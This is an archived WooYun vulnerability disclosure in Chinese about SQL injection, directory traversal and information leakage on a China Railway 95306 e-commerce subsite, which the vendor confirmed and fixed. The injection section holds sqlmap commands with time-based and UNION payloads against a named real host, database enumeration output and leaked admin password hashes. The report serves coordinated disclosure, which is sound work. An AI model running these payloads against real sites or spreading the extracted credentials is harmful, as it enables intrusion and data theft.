当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114014

漏洞标题:中国铁路总公司95306分站SQL注入+配置不当

相关厂商:12306

漏洞作者: 乌有先生

提交时间:2015-05-14 12:38

修复时间:2015-06-30 15:04

公开时间:2015-06-30 15:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-14: 细节已通知厂商并且等待厂商处理中
2015-05-19: 厂商已经确认,细节仅向厂商公开
2015-05-29: 细节向核心白帽子及相关领域专家公开
2015-06-08: 细节向普通白帽子公开
2015-06-18: 细节向实习白帽子公开
2015-06-30: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

95306分站,SQL注入、目录配置不当可遍历、敏感信息泄露、网站逻辑设计不当

详细说明:

95306主站

1.jpg


95306电子商务分站

2.jpg


0x00、SQL注入

sqlmap -u "https://xsp.95306.cn:443/page.asp?id=-1"


---
Parameter: id (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=-1;WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(102)+CHAR(73)+CHAR(121)+CHAR(71)+CHAR(76)+CHAR(119)+CHAR(76)+CHAR(117)+CHAR(107)+CHAR(99)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113),NULL,NULL--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] stepgozsdata
[*] tempdb
---
current user is DBA: False
---
Database: stepgozsdata
[24 tables]
+------------------+
| KDZF |
| about |
| adkefu |
| admin |
| banner |
| cart |
| complain |
| hzxx |
| i_pic |
| keywords |
| msg |
| news |
| orderfahuo |
| orderlist |
| pro_addattention |
| pro_addattention |
| pro_bclass |
| pro_brand |
| pro_class |
| pro_consultation |
| pro_fav |
| pro_score |
| vip_recived |
| vip_recived |
+------------------+
---
Database: stepgozsdata
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| dbo.vip_recived | 1713 |
| dbo.vip_recived | 1713 |
| dbo.cart | 836 |
| dbo.orderlist | 582 |
| dbo.pro_class | 426 |
| dbo.pro_bclass | 68 |
| dbo.KDZF | 63 |
| dbo.pro_brand | 22 |
| dbo.orderfahuo | 17 |
| dbo.about | 12 |
| dbo.banner | 6 |
| dbo.pro_fav | 5 |
| dbo.hzxx | 2 |
| dbo.pro_addattention | 2 |
| dbo.pro_addattention | 2 |
| dbo.adkefu | 1 |
| dbo.admin | 1 |
| dbo.complain | 1 |
| dbo.i_pic | 1 |
| dbo.keywords | 1 |
| dbo.msg | 1 |
| dbo.news | 1 |
| dbo.pro_consultation | 1 |
+----------------------+---------+
---
Database: stepgozsdata
Table: admin
[1 entry]
+----+------------------+-----------+
| id | adminpwd | adminname |
+----+------------------+-----------+
| 1 | 7a57a5a743894a0e | admin |
+----+------------------+-----------+
---
Database: stepgozsdata
Table: adkefu
[1 entry]
+----+--------+------------------+-----------+
| id | danwei | adminpwd | adminname |
+----+--------+------------------+-----------+
| 9 | P | fac8fbd2667c6995 | chouming |
+----+--------+------------------+-----------+
---
其中有大量货运订单详细信息。
另外,类似的注入还有好几处。
eg:
https://xsp.95306.cn:443/brand.asp?brand=-1
0x01、目录配置不当可遍历
eg:

3.jpg


4.jpg


以上列表中目录均可遍历。
0x02、敏感信息泄露

5.jpg


6.jpg


7.jpg


8.jpg


0x03、网站逻辑设计不当
任意已注册用户,登陆得到相同页面,包含特定订单信息。
未登陆页面:

9.jpg


10.jpg


登陆任意用户页面:

11.jpg


12.jpg


难道是测试专用页...?即便这样还是觉得有问题。

漏洞证明:

如上

修复方案:

修整或者下线。

版权声明:转载请注明来源 乌有先生@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-05-19 09:13

厂商回复:

谢谢。

最新状态:

2015-06-11:已修复

2015-06-30:暂无